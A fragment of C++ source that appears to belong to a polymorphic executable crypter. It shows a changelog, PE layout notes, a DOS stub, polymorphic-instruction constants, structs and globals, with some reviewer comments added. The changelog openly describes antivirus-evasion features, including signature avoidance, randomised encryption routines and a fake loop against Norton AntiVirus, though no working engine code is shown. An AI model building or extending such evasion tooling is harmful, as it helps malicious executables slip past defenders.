#include <windows.h>
#include <winnt.h>
#include <imagehlp.h>
#include <time.h>
#include <iostream>
#include <tchar.h>
//if RUBBISH_NOPS defined, inserted rubbish are nops only (good for debugging)
//#define RUBBISH_NOPS
//#define STATIC_CONTEXT
//ORIGINAL
//this is how our new PE loox like:
//
//CodeSection:
//0..0x10: jmp GetProcAddress+jmp LoadLibrary+pad
//0x10..0x10+KeySize:Key
//0x10+KeySize..0x10+KeySize+sizeof(DynLoader):DynLoader
//0x10+KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//
//Changelog 1.2a
//moved import function jmps (getprocaddress, loadlibrary) to the end of initdata/polymorphic loader to
//prevent AV detection (code section started with ..000000FF2534.. which was a signature):
//implemented several variants of each jmp to import section (getprocaddress, loadlibrary) and added fixups
//this is how our new PE loox like:
//
//CodeSection:
//0x0..KeySize:Key
//KeySize..KeySize+sizeof(DynLoader):DynLoader
//KeySize+sizeof(DynLoader): code
//
//DataSection:
//0..sizeof(host)-1: host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.2b
//- some random data (CoderRoller1) into encryption routine (DynCoder and Decoder)
//- data section eliminated (too risky to have it)
//- minor bug fixes
//
//this is how our new PE loox like:
//
//CodeSection:
//0: Rubbish
//KeyPtr..KeyPtr+KeySize:Key
//KeyPtr+KeySize..KeyPtr+KeySize+sizeof(DynLoader):DynLoader
//KeyPtr+KeySize+sizeof(DynLoader): code
//code+sizeof(code): host
//
//ImportSection:
//0..0x70-1: imports
//
//[TlsSection:]
//0..sizeof(tls): tls
//Changelog 1.3
//- polycode liposuction
//- polycode instruction naming
//Changelog 1.4
//- DLL SUPPORT!!!
//- well some hacks are here, so nobody can say that the code is correct - see DynLoader
//- minor bugfixes
//+ .edata section after .tls
//Changelog 1.5
//- polycode improved
//Changelog 1.6
//- polycode shrinked
//- dynloader decrypts main data
//Changelog 1.7
//- secondary encryption routine has variable-length key
//Changelog 1.8
//- polycode shrinked
//Changelog 1.9
//- icon + XP manifest support
//Changelog 2.0
//- secondary encryption routine is randomly generated
//- resource support for DLLs
//- fake loop against Norton AntiVirus
//Changelog 2.1
//- FSG 2.0 exe packer support
//Changelog 2.2
//- support for some other exe packers - Mew 1.1
//Changelog 2.3
//- fixed two serious bugz
//Changelog 2.4
//- better support for VB programs
//- support for end of file overlay data
//Changelog 2.5
//- bugfix in TLS support
//Changelog 2.6
//- bugfix in TLS support number 2
//Changelog 2.7
//- better DLL handling -> support for NT4 DLLs
//if you need sum PEB, TEB structures (like in DynLoader)
//try look at these links:
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/TEB.html
//http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
//http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html
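//we need a dos stub
//This is the tiny 16-bit program executed when the image is started under
//plain DOS: it prints a message with INT 21h/AH=09h and exits with AH=4Ch.
//Note the text embedded below is "This program must be run under Win32\r\n$",
//not the MS linker's "This program cannot be run in DOS mode".
//The array size is taken from the initializer (0x38 bytes) so it cannot drift
//from the data; DosStubEndSize (0x88) is computed on the assumption that the
//stub stays 0x38 bytes, so keep the two in step if the stub ever changes.
const BYTE DosStub[]
={0xBA,0x10,0x00,0x0E,0x1F,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x90,0x90,
0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x6D,0x75,0x73,
0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x75,0x6E,0x64,0x65,0x72,0x20,0x57,
0x69,0x6E,0x33,0x32,0x0D,0x0A,0x24,0x37};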
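//import section constants
#define NumberOfDLL 1 //number of dlls
#define NumberOfImports 2 //number of funcs
#define Kernel32Name "kernel32.dll" //name of dll
#define NtdllName "ntdll.dll" //name of ntdll.dll
#define GetProcAddressName "GetProcAddress"//name of funct1
#define LoadLibraryName "LoadLibraryA" //name of func2
//the *Size constants are strlen() of the matching *Name string (no
//terminator); keep them in step if a name changes
#define Kernel32Size 12 //length of dll name
#define GetProcAddressSize 14 //length of func1 name
#define LoadLibrarySize 12 //length of func2 name
//polymorphic instruction indexes
//Each PII_* is an index into the polymorphic loader's instruction table.
//Every expansion is parenthesized: as a bare chain of "X+1" the macros
//expanded to an unparenthesized sum, so an expression such as
//2*InitInstrCount or sizeof(x)*PII_END evaluated to the wrong value.
//*_BEGIN / *_START / *_END markers alias the first or last index of a group.
#define PII_BEGIN 0
#define PII_POLY_BEGIN (PII_BEGIN)
#define PII_POLY_PUSHAD (PII_POLY_BEGIN)
#define PII_POLY_MOV_REG_LOADER_SIZE (PII_POLY_PUSHAD+1)
#define PII_POLY_MOV_REG_LOADER_ADDR (PII_POLY_MOV_REG_LOADER_SIZE+1)
#define PII_CODER_BEGIN (PII_POLY_MOV_REG_LOADER_ADDR+1)
#define PII_CODER_CALL_GET_EIP (PII_CODER_BEGIN+1)
#define PII_CODER_GET_EIP (PII_CODER_CALL_GET_EIP+1)
#define PII_CODER_FIX_DST_PTR (PII_CODER_GET_EIP+1)
#define PII_CODER_KEY_START (PII_CODER_FIX_DST_PTR+1)
#define PII_CODER_MOV_REG_KEY (PII_CODER_KEY_START)
#define PII_CODER_FIX_SRC_PTR (PII_CODER_MOV_REG_KEY+1)
#define PII_CODER_CODE (PII_CODER_FIX_SRC_PTR+1)
#define PII_CODER_LOAD_KEY_TO_REG (PII_CODER_CODE)
#define PII_CODER_TEST_KEY_END (PII_CODER_LOAD_KEY_TO_REG+1)
#define PII_CODER_JZ_CODER_BEGIN (PII_CODER_TEST_KEY_END+1)
#define PII_CODER_ADD_DATA_IDX (PII_CODER_JZ_CODER_BEGIN+1)
#define PII_CODER_XOR_DATA_REG (PII_CODER_ADD_DATA_IDX+1)
#define PII_CODER_STORE_DATA (PII_CODER_XOR_DATA_REG+1)
#define PII_CODER_INC_SRC_PTR (PII_CODER_STORE_DATA+1)
#define PII_CODER_LOOP_CODER_CODE (PII_CODER_INC_SRC_PTR+1)
#define PII_CODER_END (PII_CODER_LOOP_CODER_CODE+1)
#define PII_POLY_JMP_DYNLOADER (PII_CODER_END+1)
#define PII_POLY_END (PII_POLY_JMP_DYNLOADER)
#define PII_END (PII_POLY_END)
//other consts
#define MaxPolyCount 20 //maximum variants for one instruction (size of VAR_INSTRUCTION::Vars)
#define InitInstrCount (PII_END+1) //polymorphic loader instruction count (PII_END is the last index)
#define RawDataAlignment 0x200 //alignment of SizeOfRawData
//0x88 = 0x100 - sizeof(IMAGE_DOS_HEADER) (0x40) - sizeof(DosStub) (0x38):
//the pad that brings DOS header + stub + pad up to 0x100 bytes, assuming the
//three are written back-to-back (the writer is not in this part of the file)
#define DosStubEndSize 0x88
//image type const (parallel to enum IMAGE_TYPE below: itExe/itDLL/itSys;
//IMAGE_TYPE_UNKNOWN has no enum counterpart)
#define IMAGE_TYPE_EXE 0
#define IMAGE_TYPE_DLL 1
#define IMAGE_TYPE_SYS 2
#define IMAGE_TYPE_UNKNOWN 0xFFFFFFFF
//this dword is at the end of DYN_LOADER in decoded form
#define DYN_LOADER_END_MAGIC 0xC0DEC0DE
#define DYN_LOADER_DEC_MAGIC 0x1EE7C0DE
//registers: the standard x86 3-bit register numbers used in opcode encoding
#define REG_EAX 0
#define REG_ECX 1
#define REG_EDX 2
#define REG_EBX 3
#define REG_ESP 4
#define REG_EBP 5
#define REG_ESI 6
#define REG_EDI 7
#define REG_NON 255 //sentinel: no register
#define Reg8Count 8
#define Reg16Count 8
#define Reg32Count 8
#define RT_XP_MANIFEST 24 //resource type 24 = RT_MANIFEST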
//our type for all about tls section
//Same layout as the 32-bit PE TLS directory (IMAGE_TLS_DIRECTORY32 in
//winnt.h): six DWORDs, 24 bytes, in on-disk order. Presumably declared
//locally so the layout does not depend on the SDK's definition - confirm.
//Per the PE format the four address fields hold VAs (image base included),
//not RVAs, which is why the tool must patch them when the base changes.
typedef struct _IMAGE_TLS_DIRECTORY__ {
DWORD StartAddressOfRawData; //VA of the start of the TLS template
DWORD EndAddressOfRawData; //VA one past the end of the TLS template
DWORD AddressOfIndex; //PDWORD: VA of the slot that receives the TLS index
DWORD AddressOfCallBacks; //PIMAGE_TLS_CALLBACK *: VA of the NULL-terminated callback array
DWORD SizeOfZeroFill; //bytes of zero-initialised TLS after the template
DWORD Characteristics; //alignment flags
} IMAGE_TLS_DIRECTORY__, *PIMAGE_TLS_DIRECTORY__;
//our type for all about tls section
//Working copy of everything the tool keeps about the host's TLS section so
//it can be re-emitted into the new image. Pointers here view other buffers;
//ownership is decided at the use sites, which are outside this part of the file.
typedef struct _TLS_COPY
{
PIMAGE_DATA_DIRECTORY Directory; //presumably the host's IMAGE_DIRECTORY_ENTRY_TLS entry - confirm
PIMAGE_TLS_DIRECTORY__ SectionData; //the TLS directory itself (see IMAGE_TLS_DIRECTORY__)
DWORD RawData; //NOTE(review): looks like an offset/RVA of the TLS template - confirm
DWORD RawDataLen,Index; //RawDataLen: template length in bytes; Index: meaning not visible here
PCHAR Callbacks; //copy of the callback array bytes
DWORD CallbacksLen; //length of Callbacks in bytes
}TLS_COPY;
//one pseudo-instruction (p-i) from polymorphic engine (can contain more than one x86 instruction)
//one pseudo-instruction (p-i) from polymorphic engine (can contain more than one x86 instruction)
//Code holds at most 31 bytes, but Len is a BYTE and can express up to 255:
//whatever fills these records must keep Len <= sizeof(Code), and whatever
//applies Fix1..Fix4 must keep each index < Len, or the copy reads past Code.
typedef struct _INSTRUCTION
{
BYTE Len; //opcode length in bytes (valid prefix of Code)
BYTE Fix1,Fix2,Fix3,Fix4; //byte indexes into Code that get patched (fixups); the "unused" value is not visible here - confirm
CHAR Code[31]; //opcode bytes
}INSTRUCTION;
//a list of p-i, we will chose one each time and put it into a code
//a list of p-i, we will chose one each time and put it into a code
//Invariants the filler/picker must keep: Count <= MaxPolyCount and
//Index < Count, otherwise Vars is read out of bounds.
typedef struct
{
BYTE Count,Index; //number of p-i and number of the chosen
DWORD VirtualAddress; //address of instruction in CODE section
INSTRUCTION Vars[MaxPolyCount]; //the list (fixed capacity, see MaxPolyCount)
}VAR_INSTRUCTION;
//A resource directory header immediately followed by one directory entry -
//the on-disk shape of a resource directory node with exactly one child.
//Any node with more entries cannot be represented by this struct.
typedef struct _RESOURCE_TABLE_DIRECTORY_ENTRY{
IMAGE_RESOURCE_DIRECTORY Table; //directory header (entry counts, timestamps)
IMAGE_RESOURCE_DIRECTORY_ENTRY Directory; //its single entry
}RESOURCE_TABLE_DIRECTORY_ENTRY, *PRESOURCE_TABLE_DIRECTORY_ENTRY;
//One entry of an RT_GROUP_ICON resource (the GRPICONDIRENTRY layout, 14 bytes).
//The 32-bit "bytes in resource" field is split into two WORDs; presumably so
//the struct has no tail padding and an array of them matches the on-disk
//packing exactly - confirm against the code that copies it.
typedef struct _ICON_DIRECTORY_ENTRY{
BYTE Width; //icon width in pixels (0 means 256)
BYTE Height; //icon height in pixels (0 means 256)
BYTE ColorCount; //colours in the palette, 0 if >= 256
BYTE Reserved;
WORD Planes; //colour planes
WORD BitCount; //bits per pixel
WORD BytesInRes1; //low WORD of the image size in bytes
WORD BytesInRes2; //high WORD of the image size in bytes
WORD ID; //resource ID of the matching RT_ICON
}ICON_DIRECTORY_ENTRY, *PICON_DIRECTORY_ENTRY;
//An RT_GROUP_ICON resource header (GRPICONDIR) with room for 32 entries.
//Entries is a fixed array, so whatever reads a host icon group must clamp
//Count to 32 before copying; the on-disk Count is attacker-controlled data
//and may be larger.
typedef struct _ICON_DIRECTORY{
WORD Reserved; //always 0
WORD ResType; //1 for icons
WORD Count; //number of valid Entries
ICON_DIRECTORY_ENTRY Entries[32]; //capacity 32, only Count are valid
}ICON_DIRECTORY, *PICON_DIRECTORY;
//kind of the host image; values line up with IMAGE_TYPE_EXE/_DLL/_SYS
enum IMAGE_TYPE { itExe = 0, itDLL = 1, itSys = 2 };
//pointer to a stdcall routine taking one pointer and returning a DWORD;
//EncoderProc below holds one. What AAddr points to and what the return
//value means are not visible in this part of the file.
typedef DWORD (__stdcall *TEncoderProc)(void * AAddr);
//--- file-scope state: the whole tool works on these globals, so there is no
//ownership tracking here. Which site allocates and frees each PCHAR buffer,
//and which pointers merely view another buffer, has to be checked where they
//are used (outside this part of the file).
PIMAGE_DOS_HEADER pimage_dos_header; //header views into an in-memory image (presumably the host - confirm)
PIMAGE_NT_HEADERS pimage_nt_headers;
PIMAGE_EXPORT_DIRECTORY pimage_export_directory;
IMAGE_DOS_HEADER DosHeader; //headers of the image being built
CHAR DosStubEnd[DosStubEndSize]; //pad after DosStub so header + stub + pad reach 0x100 bytes (see DosStubEndSize)
IMAGE_NT_HEADERS NtHeaders;
HANDLE FileHandle,MainFile; //open file handles
char InputFileName[255]; //fixed-size buffers: whatever copies argv/options into these must bound the copy at sizeof(buf) - 1
char OutputFileName[255];
char Options[64];
DWORD NumBytes,TotalFileSize,MainSize,LoaderSize; //sizes in bytes
DWORD VirtLoaderData,VirtMainData,VirtKey,InitSize,KeyPtr; //NOTE(review): Virt* look like RVAs/VAs of the named blobs - confirm
DWORD AnyDWORD,LoaderPtr,TlsSectionSize,Delta,HostImageBase;
DWORD HostSizeOfImage,HostCharacteristics; //Host* fields are copied from the input image's headers
DWORD ReqImageBase,RandomValue,ExportSectionSize;
DWORD CurVirtAddr,CurRawData,ExportRVADelta; //running section placement cursors - confirm
DWORD HostExportSectionVirtualAddress;
DWORD ExportNamePointerRVAOrg,ExportAddressRVAOrg;
DWORD ImportSectionDataSize,HostImportSectionSize,ImportSectionDLLCount;
DWORD HostImportSectionVirtualAddress,InitcodeThunk;
DWORD CodeSectionVirtualSize,LoaderRealSize;
DWORD MainRealSize,MainRealSize4,LogCnt,MainDataDecoderLen;
DWORD DynLoaderDecoderOffset,LdrPtrCode,LdrPtrThunk;
DWORD ResourceSectionSize,HostResourceSectionSize;
//DWORD ResourceIconGroupDataSize
DWORD HostResourceSectionVirtualAddress;
//DWORD ResourceXPMDirSize;
DWORD AfterImageOverlaysSize; //bytes of data found after the host's last section
IMAGE_SECTION_HEADER CodeSection; //section headers of the output image
IMAGE_SECTION_HEADER ExportSection;
IMAGE_SECTION_HEADER TlsSection;
IMAGE_SECTION_HEADER ImportSection;
IMAGE_SECTION_HEADER ResourceSection;
IMAGE_IMPORT_DESCRIPTOR ImportDesc; //import descriptor for the single DLL (see NumberOfDLL)
IMAGE_IMPORT_DESCRIPTOR NullDesc; //all-zero terminator of the descriptor list
PIMAGE_IMPORT_DESCRIPTOR PImportDesc;
IMAGE_THUNK_DATA ThunkGetProcAddress; //thunks for the two imports (see NumberOfImports)
IMAGE_THUNK_DATA ThunkLoadLibrary;
//WORD NullWord;
WORD KeySize,TrashSize,Trash2Size,HostSubsystem; //lengths are 16-bit here; callers must not exceed 0xFFFF
PCHAR MainData,MainDataCyp,LoaderData,Key,InitData,Trash,Trash2; //raw byte buffers; the *Size/*Len globals above carry their lengths
PCHAR ExportData,ImportSectionData,ResourceData;
PCHAR MainDataEncoder,MainDataDecoder,AfterImageOverlays;
char *PB,*PB2,*PB3,*PB4,*DynLoaderSub,*LdrPtr,*MainDataDecPtr; //scratch write cursors - confirm at use sites
BOOL TlsSectionPresent,ExportSectionPresent,Quiet,DynamicDLL; //feature flags derived from the host and the command line
BOOL ResourceSectionPresent,SaveIcon,SaveOverlay,OverlayPresent;
TLS_COPY TlsCopy;
IMAGE_TLS_DIRECTORY__ TlsSectionData;
IMAGE_TYPE ImageType; //itExe / itDLL / itSys
//DWORD * DynLoaderJmp;
PIMAGE_RESOURCE_DIRECTORY ResourceRoot; //views into the resource tree being built/copied
PIMAGE_RESOURCE_DIRECTORY ResourceIconGroup;
PIMAGE_RESOURCE_DIRECTORY ResourceXPManifest;
PIMAGE_RESOURCE_DIRECTORY_ENTRY ResourceDirEntry;
TEncoderProc EncoderProc; //see TEncoderProc
//---------------------------------------------------------